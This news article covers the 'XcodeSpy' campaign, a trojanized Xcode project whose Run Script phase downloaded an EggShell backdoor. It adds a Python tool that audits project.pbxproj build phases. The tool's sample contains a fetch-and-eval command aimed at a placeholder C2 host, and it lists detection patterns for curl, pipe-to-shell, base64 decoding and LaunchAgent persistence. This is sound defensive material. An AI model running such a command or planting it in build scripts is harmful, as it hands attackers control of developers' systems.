“XcodeSpy” malware aimed at developers using Apple’s Xcode, researchers warn

SentinelLabs, SentinelOne’s threat intelligence and malware analysis division, revealed on March 18 that it had discovered a malicious Xcode project that hijacks the systems of developers building apps for Apple products and spreads a customized “EggShell” backdoor. The malware, named “XcodeSpy,” targets Xcode, the integrated development environment (IDE) used to develop Apple software and applications on macOS. According to the research published by SentinelLabs, the attackers targeted iOS developers by abusing Xcode’s “Run Script” feature to trojanize Xcode projects that are freely shared online.

The project as it existed before being trojanized is legitimate and open source on GitHub. The copy carrying XcodeSpy claims to offer “advanced features” for animating the iOS tab bar. When a developer downloads it and launches the initial build, however, it runs a malicious script and installs the EggShell backdoor. The malicious project examined by SentinelLabs researchers is a modification of a legitimate project called “TabBar Interaction”; the code of that GitHub project and its developers are said to be free of XcodeSpy.

The Run Script in the trojanized copy was secretly tampered with so that the developer’s project connects to the attacker’s command-and-control (C2) server. What is abused is Xcode’s ability to execute custom shell scripts when an instance of the app is built and launched. When triggered, the script contacts the C2 server and downloads a customized variant of the EggShell backdoor. Through that backdoor, a user LaunchAgent that runs persistently is then installed. EggShell can hijack the targeted developer’s microphone, camera and keyboard, as well as upload and download files.

At least one US organization has been targeted by this type of attack, SentinelLabs said, and developers in Asia appear to have been targeted intensively. According to SentinelLabs, the attack campaign appears to have been active at least between July and October 2020.
The researchers say, “XcodeSpy seems to be targeting the developers themselves rather than the products they create and their clients. It also backdoors the developer’s work environment. It is a means of getting, in a short process, from the point of setting up to sending malware to the users who use the developer’s software.” They add: “Everyone who develops apps for Apple products should carefully evaluate whether there are any malicious Run scripts lurking when adopting an Xcode project developed by a third party.”
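As an added illustration of the check the researchers recommend (this is example code written for this article, not SentinelLabs’ tooling or anything from the TabBar Interaction project), the script below reads an Xcode `project.pbxproj` file, extracts every `PBXShellScriptBuildPhase` (the on-disk form of a “Run Script” build phase) and flags script bodies that download from the network, pipe fetched content into a shell, use `eval`, decode base64, or touch LaunchAgents. The embedded `project.pbxproj` fragment is constructed for the example, with one benign phase and one suspicious one; the C2 hostname in it is a placeholder under the reserved `.invalid` domain.

```python
import re
import sys
from pathlib import Path

# Constructed project.pbxproj fragment (not from the page or any real project):
# the first Run Script phase is a typical linter call, the second contacts a
# placeholder server and evaluates whatever it returns, in the background.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0000000000000000000001 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA0000000000000000000002 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "eval \"$(curl -s https://c2.example.invalid/stage1)\" &\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One block per Run Script phase: "<id> /* comment */ = { isa = PBXShellScriptBuildPhase; ... };"
PHASE_RE = re.compile(
    r'(?P<id>[0-9A-Fa-f]{4,24}) /\* (?P<comment>[^*]*) \*/ = \{\s*'
    r'isa = PBXShellScriptBuildPhase;(?P<body>.*?)\};', re.S)
# pbxproj string values are double-quoted with backslash escapes (\" and \n).
QUOTED = r'"((?:[^"\\]|\\.)*)"'
SCRIPT_RE = re.compile(r'shellScript = ' + QUOTED + ';', re.S)
NAME_RE = re.compile(r'name = ' + QUOTED + ';')

# Heuristics for behaviour a build script has no business performing.
RISK_PATTERNS = [
    ("downloads content from the network (curl/wget)", r'\b(curl|wget)\b'),
    ("pipes fetched content into an interpreter", r'\|\s*(sh|bash|zsh|python\d*)\b'),
    ("uses eval to run dynamically built commands", r'\beval\b'),
    ("decodes an embedded base64 payload", r'base64\s+(-d|-D|--decode)'),
    ("runs AppleScript via osascript", r'\bosascript\b'),
    ("touches LaunchAgents/launchctl (persistence)", r'LaunchAgents|\blaunchctl\b'),
    ("backgrounds a command so the build continues", r'&\s*$'),
]


def unescape_pbx(value):
    """Turn a pbxproj-escaped string (\\n, \\", \\\\) back into plain text."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), value)


def extract_run_scripts(pbxproj_text):
    """Return (object_id, phase_name, script_body) for every Run Script phase."""
    phases = []
    for m in PHASE_RE.finditer(pbxproj_text):
        body = m.group('body')
        name_m = NAME_RE.search(body)
        name = unescape_pbx(name_m.group(1)) if name_m else m.group('comment')
        script_m = SCRIPT_RE.search(body)
        script = unescape_pbx(script_m.group(1)) if script_m else ""
        phases.append((m.group('id'), name, script))
    return phases


def score_script(script):
    """List the risk descriptions whose pattern matches the script body."""
    return [desc for desc, rx in RISK_PATTERNS if re.search(rx, script, re.M)]


def audit_pbxproj(pbxproj_text):
    """Audit every Run Script phase; 'findings' is empty for phases that look benign."""
    return [{"id": oid, "name": name, "script": script, "findings": score_script(script)}
            for oid, name, script in extract_run_scripts(pbxproj_text)]


def audit_project(path):
    """Accept either a .xcodeproj bundle or a project.pbxproj file path."""
    p = Path(path)
    if p.is_dir():
        p = p / "project.pbxproj"
    return audit_pbxproj(p.read_text(encoding="utf-8"))


if __name__ == "__main__":
    report = audit_project(sys.argv[1]) if len(sys.argv) > 1 else audit_pbxproj(SAMPLE_PBXPROJ)
    for phase in report:
        verdict = "SUSPICIOUS" if phase["findings"] else "ok"
        print(f'[{verdict}] {phase["id"]} "{phase["name"]}"')
        for f in phase["findings"]:
            print(f"    - {f}")
        print("    script: " + phase["script"].strip().replace("\n", "\n            "))
```

Run it with no argument to audit the embedded sample, or pass a `.xcodeproj` path to audit a project before its first build; any phase with findings deserves a manual read of the script before you let Xcode execute it, since Xcode runs these phases with the building user’s privileges.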